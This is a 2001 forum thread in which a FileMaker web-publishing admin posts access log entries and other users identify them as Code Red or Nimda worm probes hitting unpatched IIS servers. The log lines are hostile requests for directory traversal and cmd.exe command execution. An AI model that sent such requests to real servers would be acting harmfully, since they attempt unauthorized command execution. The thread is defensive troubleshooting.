Jump to content
View in the app

A better way to browse. Learn more.
FMForums.com

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Yikes - Access Log?

Hammerton
in Custom Web Publishing

Featured Replies

I recently started up a new FM5 Unlimited server set-up. Over the weekend I got an enormous number of requests, all of the sort that I have pasted below. The sites that I serve are academic and should not be getting any hits. Are these robots? Hacks? Or is this what a typical visit looks like on the access log. I previously used FM4.1 and it either didn't have this feature or I was too stupid to use it. I have limited IP access to my subnet so I don't think any damage was done in any event.

203.73.193.54 - - [15/Dec/2001:07:51:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1372

203.73.193.54 - - [15/Dec/2001:07:52:16 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1368

203.73.193.54 - - [15/Dec/2001:07:52:18 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

203.73.193.54 - - [15/Dec/2001:07:52:20 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

203.73.193.54 - - [15/Dec/2001:07:52:31 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416

203.73.193.54 - - [15/Dec/2001:07:52:32 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

203.73.193.54 - - [15/Dec/2001:07:52:37 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

203.73.193.54 - - [15/Dec/2001:07:54:12 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

203.73.193.54 - - [15/Dec/2001:07:54:14 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

Those hits are from an internet worm. Either "Code Red" or "Nimda". If you are running IIS, make sure you have installed all the Microsoft Code Red patches. The hits are comming from other unpatched and infected IIS servers. Other than installing the patches there is not much you can do to prevent this.

Good luck,

Martin

  • Author

Thanks Martin. I am running webstar on an old mac, and connecting to FM5U thru the FMWSC. Does any of that afford me protection? How do other folks deal with this? I read some posts about blocking access to those IPs but that seems futile given the volume.

As long as you are not using IIS on Windows you are safe.

  • Author

Dwal - Thanks. IPNetSentry is great! see my post titled Cool Security Solution

Create an account or sign in to comment

https://fmforums.com/topic/1120-yikes-access-log/
Go to topic listing

Important Information

By using this site, you agree to our Terms of Use.

I accept

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.